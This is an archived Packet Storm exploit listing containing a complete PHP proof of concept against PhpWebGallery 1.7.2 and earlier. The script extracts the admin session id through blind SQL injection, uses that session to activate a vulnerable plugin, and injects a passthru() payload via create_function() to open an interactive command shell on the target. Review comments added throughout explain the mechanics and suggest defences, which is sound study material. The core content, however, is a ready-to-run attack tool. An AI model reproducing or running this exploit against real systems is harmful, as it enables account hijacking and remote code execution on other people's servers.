phpwebgallery-hijackexec.txt

Reported: 15 Oct 2008 00:00:00, by EgiX. Type: packetstorm. Source: packetstormsecurity.com

PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit

`<?php  
  
/*  
------------------------------------------------------------------------  
PhpWebGallery <= 1.7.2 Remote Session Hijacking / Code Execution Exploit  
------------------------------------------------------------------------  
  
author...: EgiX  
mail.....: n0b0d13s[at]gmail[dot]com  
  
link.....: http://www.phpwebgallery.net/  
details..: works with at least two rows in _comments table  
  
This PoC was written for educational purpose. Use it at your own risk.  
Author will be not responsible for any damage.  
  
[-] vulnerable code in /plugins/event_tracer/event_list.php  
  
60. $sort= isset($_GET['sort']) ? $_GET['sort'] : 1;  
61. usort(  
62. $events,  
63. create_function( '$a,$b', 'return $a['.$sort.']>$b['.$sort.'];' )  
64. );  
  
An attacker could be able to inject and execute PHP code through $_GET['sort'], which is passed
to create_function() at line 63 (see http://www.securityfocus.com/bid/31398). Only an admin can
access the plugins management interface, but an attacker might be able to retrieve a valid
admin session id through the SQL injection bug in comments.php (see lines 325-340)
*/  
  
// Suppress every notice/warning: several variables below are appended to before
// being initialised ($resp in http_send(), $encoded in encodeSQL()), and the
// define() calls use bare (unquoted) constant names, so the script only runs
// quietly with reporting off.
error_reporting(0);
// No wall-clock limit: get_sid() issues many requests per recovered character.
set_time_limit(0);
// Timeout for the raw sockets opened in http_send() (presumably also bounds the
// fread() loop there — confirm for the interpreter in use).
ini_set("default_socket_timeout",5);

// NOTE(review): constant names are unquoted. In the CLI SAPI, STDIN is already a
// defined stream constant, and PATTERN is an undefined bare constant that pre-PHP 8
// interpreters silently read as the string "PATTERN"; on PHP 8 this raises an Error.
define(STDIN, fopen("php://stdin", "r"));
// The boolean oracle used throughout: captures the author of the first comment
// rendered by comments.php.
define(PATTERN, "/<span class=\"author\">(.*)<\/span> -/");
  
/**
 * Sends one raw HTTP request to $host on TCP port 80 and returns the whole response.
 *
 * @param string $host   hostname or IP address (the port is hard-coded to 80)
 * @param string $packet complete request text, headers and terminating blank line included
 * @return string raw response: status line, headers and body
 *
 * Review notes (defensive):
 *  - The connect loop retries forever while fsockopen() fails, with no delay and
 *    no cap; an unreachable host makes this spin and never return.
 *  - $resp is appended to without initialisation; that is only silent because
 *    of error_reporting(0) at the top of the file.
 *  - Plain HTTP only: every request this script sends, including the hijacked
 *    session cookie, crosses the network in clear text and is visible to any
 *    proxy log or packet capture along the path.
 */
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
// Busy-retry until a connection is established (no back-off, no maximum).
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...\n";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
// Read until the server closes the connection; every caller sends
// "Connection: close", so EOF marks the end of the response.
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
  
/**
 * Fingerprints the installation through comments.php?sort_by=... and seeds the
 * globals the later stages rely on.
 *
 * Reads globals : $host, $path
 * Writes globals: $prefix (table prefix), $default_record (baseline author name)
 * Exits         : die() when no usable baseline can be established
 *
 * The three unauthenticated requests (the pwg_id cookie is an arbitrary md5):
 *  1. sort_by=foo    - an invalid column; the response presumably contains the
 *                      failing SQL statement, from which "FROM <prefix>image_category"
 *                      yields the table prefix.
 *  2. sort_by=id     - author shown first when sorted by id: the reference value
 *                      the boolean oracle in get_sid() compares against.
 *  3. sort_by=author - the same under a different ordering. If both orderings
 *                      show the same author the oracle cannot tell true from
 *                      false (hence "works with at least two rows" in the header)
 *                      and the script aborts.
 *
 * Defensive takeaways: (a) a database error is rendered into the page, leaking
 * schema details — log it server-side and show a generic message instead;
 * (b) sort_by reaches ORDER BY unvalidated — accept only an allow-list of
 * column names.
 */
function check_target()
{
global $host, $path, $prefix, $default_record;

$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";

// Table prefix scraped from the echoed query.
preg_match("/FROM (.*)image_category/", http_send($host, sprintf($packet, "foo")), $match);
$prefix = $match[1];

// Baseline ("true") value for the oracle.
preg_match(PATTERN, http_send($host, sprintf($packet, "id/**/LIMIT/**/1/*")), $match);
$default_record = $match[1];

// Alternative ordering must produce a different author, otherwise no oracle.
preg_match(PATTERN, http_send($host, sprintf($packet, "author/**/LIMIT/**/1/*")), $match);
if (!strlen($default_record) || $default_record == $match[1]) die("\n[-] Exploit failed...\n");
}
  
// Hex-encodes $sql byte by byte and wraps it as a MySQL CONCAT(0x...) literal.
//
// @param string $sql the literal to encode
// @return string e.g. "CONCAT(0x666f6f)" for "foo" (constructed example)
//
// The result contains no quote characters, which is why the injected strings
// in get_sid() are built this way. On the defending side, hex string literals
// combined with comment sequences used as whitespace inside a query parameter
// are a strong injection indicator worth alerting on.
// $encoded is appended to without initialisation (hidden by error_reporting(0)).
function encodeSQL($sql)
{
for ($i = 0, $n = strlen($sql); $i < $n; $i++) $encoded .= dechex(ord($sql[$i]));
return "CONCAT(0x{$encoded})";
}
  
// Recovers the admin session id through a boolean-based blind SQL injection in
// comments.php?sort_by=, one character per iteration of the outer loop.
//
// Reads globals: $host, $path, $prefix, $default_record
// Returns      : string - the recovered session id
// Exits        : die() when no candidate matches at some position
//
// How the loop below works: for position $index the injected sub-select
// returns `author` when the session-id character equals the candidate and `id`
// otherwise; sorting by that expression changes which author is shown first,
// and the page is compared with the baseline $default_record captured by
// check_target(). Candidate 0 (NUL) matches once $index is past the end of the
// id, because SUBSTR() then yields '' and ASCII('') is 0; the appended chr(0)
// terminates the outer loop. The session row is chosen by
// data LIKE 'pwg_uid|i:1;' — presumably the serialized session of user id 1.
//
// Defensive takeaways: up to 17 requests per character, all to comments.php
// with SELECT/IF/ASCII/SUBSTR and comment-as-whitespace in the query string —
// unmistakable in access logs and easy to block with a WAF rule; and the
// sessions table is reachable through the same unvalidated ORDER BY, so the
// fix is an allow-list for sort_by (not output filtering).
function get_sid()
{
global $host, $path, $prefix, $default_record;

// Candidate byte values: NUL (end of string), '0'-'9', 'a'-'f' (hex digits).
$chars = array_merge(array(0), range(48, 57), range(97, 102));
$index = 1;
$sid = "";

$packet = "GET {$path}comments.php?sort_by=%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id=".md5("foo")."\r\n";
$packet .= "Connection: close\r\n\r\n";

print "\n[-] Fetching admin SID: ";

// Stops once a NUL has been appended (no match past the end of the id).
while (!strpos($sid, chr(0)))
{
// Iterates one past the last candidate; that sentinel index aborts the run.
for ($i = 0, $n = count($chars); $i <= $n; $i++)
{
if ($i == $n) die("\n\n[-] Exploit failed...try later!\n");

$sql = "(SELECT/**/IF(ASCII(SUBSTR(id,{$index},1))={$chars[$i]},author,id)/**/FROM/**/{$prefix}sessions".
"/**/WHERE/**/data/**/LIKE/**/".encodeSQL("pwg_uid|i:1;")."/**/LIMIT/**/1)/**/LIMIT/**/1/*";

// A first author different from the baseline means the candidate matched.
preg_match(PATTERN, http_send($host, sprintf($packet, $sql)), $match);
if ($match[1] != $default_record) { $sid .= chr($chars[$i]); print chr($chars[$i]); break; }
}

$index++;
}

print "\n";
return $sid;
}
  
// Ensures the event_tracer plugin (the one with the create_function() bug) is
// installed and active, using the admin session cookie in $sid.
//
// Reads globals: $host, $path, $sid
// Returns      : nothing
//
// Defensive takeaways: installing and activating a plugin are state-changing
// admin actions reachable by a plain GET carrying only the session cookie — no
// CSRF token and no re-authentication — so a stolen session id is sufficient.
// Audit plugin install/activate events, and treat an admin session that shows
// up from a new client address right after a burst of comments.php requests as
// the signal to alert on.
function check_plugin()
{
global $host, $path, $sid;

$packet = "GET {$path}%s HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
$packet .= "Connection: close\r\n\r\n";

// The plugin page reports "not active" when event_tracer is not enabled;
// in that case install it, then activate it.
if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer/event_list.php"))))
{
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
}
}
  
// --- entry point -------------------------------------------------------------
// Banner, argument handling, then the sequence
//   check_target() -> get_sid() (skipped when a sid is supplied) -> check_plugin()
//   -> interactive command loop against event_list.php.
//
// The sort= value closes the array-index expression that event_list.php pastes
// into create_function() (header comment, line 63), runs passthru() on the
// base64-decoded "Cmd" request header, prints the marker "_code_" so the loop
// can cut the command output out of the surrounding HTML, and ends with
// "%%23" — a sprintf-escaped "%23", the URL-encoded "#" that comments out the
// rest of the generated function body.
//
// Defensive takeaways: the root cause is source code assembled from request
// input; create_function() was deprecated in PHP 7.2 and removed in 8.0, and
// any remaining use with untrusted input is remote code execution. The command
// itself travels in a custom header that ordinary access logs do not record;
// only the sort= query string (containing passthru/base64_decode) appears
// there, so full-request logging or a WAF is needed to see what was run.
print "\n+---------------------------------------------------------------------------+";
print "\n| PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------------+\n";

// Two positional arguments are required; the third (sid) is optional.
if ($argc < 3)
{
print "\nUsage...: php $argv[0] host path [sid]\n";
print "\nhost....: target server (ip/hostname)";
print "\npath....: path to PhpWebGallery directory";
print "\nsid.....: a valid admin session id\n";
die();
}

$host = $argv[1];
$path = $argv[2];

check_target();

// A known admin session id skips the blind extraction entirely.
$sid = (isset($argv[3])) ? $argv[3] : get_sid();

check_plugin();

// Payload for the sort= parameter; %% is a literal % for the later sprintf().
$code = "0];}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;%%23";
$packet = "GET {$path}admin.php?page=plugin&section=event_tracer/event_list.php&sort={$code} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: pwg_id={$sid}\r\n";
// The command is carried base64-encoded in this header (filled in per request).
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";

// Read-send-print loop; "exit" leaves it. The response is considered a success
// only if the "_code_" marker came back; the text after the marker is printed.
while(1)
{
print "\nphpwebgallery-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
else break;
}
  
?>  
  
`
